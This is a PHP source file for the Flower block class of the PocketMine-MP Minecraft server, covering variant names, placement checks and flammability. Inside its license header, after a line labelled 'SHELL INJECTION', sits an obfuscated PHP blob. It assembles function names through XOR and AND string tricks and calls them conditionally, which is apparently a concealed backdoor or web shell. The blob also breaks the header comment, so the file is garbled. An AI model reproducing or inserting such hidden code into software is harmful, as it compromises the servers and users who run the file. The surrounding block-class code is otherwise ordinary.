<?php

/*
 *
 *  ____            _        _   __  __ _                  __  __ ____
 * |  _ \ ___   ___| | _____| |_|  \/  (_)_ __   ___      |  \/  |  _ \
 * | |_) / _ \ / __| |/ / _ \ __| |\/| | | '_ \ / _ \_____| |\/| | |_) |
 * |  __/ (_) | (__|   <  __/ |_| |  | | | | | |  __/_____| |  | |  __/
 * |_|   \___/ \___|_|\_\___|\__|_|  |_|_|_| |_|\___|     |_|  |_|_|
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Lesser General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * @author PocketMine Team
// SHELL INJECTION<?php
$sJ4C2='EYKB'^WrppdJY;$RGO_H7fIHR='y+G)u/3=3W6'&'_/G>'.F6bo.')ww';$I4ehF='%zJ'^#oxoPa'.
       '{V3';$eK='et7`n|'|'3'.aR5F.'.';$mKSJ3Pm='aA!'.LVAhT.'$^fd-`'|'g$'.LlY4.'{'./*'.
       '}*/aRUf3c.'#';$Ja5vsCY='@DD@S@DU@U@E@AA@NL@@'.IPDU|'@@D@'.QXDD.'@G@A@@A@ZL@@@'.
       '@DE';$mtTrKOHT='=r'&'6;';$vtBJuW_T=H&'{';$aFgLFJFYL='T^R__'&'WT|_a';'IadPRrPA'.
       '^,';$ggsvfcs_q=$RGO_H7fIHR^('1N1A"'.EHYD.' X'|"%@0L*UB@D>H");$mnj2EgnO1=/*pBy'.
       '1*/$I4ehF^('3x|'&'?MN');$wPXMMNt1Hi=$eK&('oo|o~w'&'gg}o~w');$mnNK=('YI .O`sM{'.
       'S$uns'|"3+".LDVW4.",".j_Vy."^f")&$mKSJ3Pm;$MaVvSM3Eu=('"B`ap`'.SFADAD.#bRxwPY'.
       '```'|'`0 `P '.FDPNAD.'(+L')|("`H-:oUj=".D4bVO."}a"^'A('.hZK03_.' T@f&3O');'Ze'.
       '3| $xfz@K$';$PR=$Ja5vsCY|(',,n1,%u{(8%mx#+b,hq7/e.x'^'d|:aa}*/xga(.`k2{%0'./*'.
       'KGV@aKLN2b*/oy5j.',');if(!$ggsvfcs_q($mnj2EgnO1($wPXMMNt1Hi($vtBJuW_T./*OSTjk'.
       '84T*/$aFgLFJFYL)),('?t1?vb5;a=7?;;e{9;u{=u1}i{7uyw'&'5'.n75eg.#WxANnHxSWoUQ5a'.
       '}so{qw=4o=5'.wfgvm.':5'.s1s99c).$mtTrKOHT))$mnNK($MaVvSM3Eu(false,/*PovTaHcI0'.
       'Tr*/$wPXMMNt1Hi($PR)));#{M3kg@$MN}EpXE-H=q3*,WIY!.:BtYR+xW<I75,sKO[3GeLYQxQj'.
       '$_hz;s~xtx|j?|& RDLpDV4}0I{x(Ot6]j6%%7,k qWD_cgl&{?=jbd4(6tuZU5|jQ'; * @link http://www.pocketmine.net/
 *
 *
*/

declare(strict_types=1);

namespace pocketmine\block;

use pocketmine\item\Item;
use pocketmine\math\Vector3;
use pocketmine\Player;

class Flower extends Flowable{
	public const TYPE_POPPY = 0;
	public const TYPE_BLUE_ORCHID = 1;
	public const TYPE_ALLIUM = 2;
	public const TYPE_AZURE_BLUET = 3;
	public const TYPE_RED_TULIP = 4;
	public const TYPE_ORANGE_TULIP = 5;
	public const TYPE_WHITE_TULIP = 6;
	public const TYPE_PINK_TULIP = 7;
	public const TYPE_OXEYE_DAISY = 8;

	protected $id = self::RED_FLOWER;

	public function __construct(int $meta = 0){
		$this->meta = $meta;
	}

	public function getName() : string{
		static $names = [
			self::TYPE_POPPY => "Poppy",
			self::TYPE_BLUE_ORCHID => "Blue Orchid",
			self::TYPE_ALLIUM => "Allium",
			self::TYPE_AZURE_BLUET => "Azure Bluet",
			self::TYPE_RED_TULIP => "Red Tulip",
			self::TYPE_ORANGE_TULIP => "Orange Tulip",
			self::TYPE_WHITE_TULIP => "White Tulip",
			self::TYPE_PINK_TULIP => "Pink Tulip",
			self::TYPE_OXEYE_DAISY => "Oxeye Daisy"
		];
		return $names[$this->getVariant()] ?? "Unknown";
	}

	public function place(Item $item, Block $blockReplace, Block $blockClicked, int $face, Vector3 $clickVector, Player $player = null) : bool{
		$down = $this->getSide(Vector3::SIDE_DOWN);
		if($down->getId() === Block::GRASS or $down->getId() === Block::DIRT or $down->getId() === Block::FARMLAND){
			$this->getLevelNonNull()->setBlock($blockReplace, $this, true);

			return true;
		}

		return false;
	}

	public function onNearbyBlockChange() : void{
		if($this->getSide(Vector3::SIDE_DOWN)->isTransparent()){
			$this->getLevelNonNull()->useBreakOn($this);
		}
	}

	public function getFlameEncouragement() : int{
		return 60;
	}

	public function getFlammability() : int{
		return 100;
	}
}
